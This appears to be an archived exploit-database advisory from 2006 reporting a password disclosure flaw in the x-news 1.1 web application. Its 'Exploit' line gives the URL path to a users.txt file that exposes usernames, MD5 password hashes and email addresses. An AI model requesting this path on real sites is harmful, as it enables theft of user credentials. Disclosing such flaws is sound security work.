id: 1339
date: 12/30/2006
title: x-news 1.1 (users.txt) Remote Password Disclosure Vulnerability
author: bd0rk
cves: 

===============================================================
x-news 1.1 (users.txt) Remote Password Disclosure Vulnerability
===============================================================



Affected Software: x-news 1.1

x-news Website: http://xqus.com

Bugfounder: bd0rk

Greetings: str0ke, Perle, TheJT, ajann

[+]Exploit: http://[target]/[x_news_path]/news/db/users.txt

Showexample: |username|MD5-Hash|eMail|



#  0day.today [2023-03-27]  #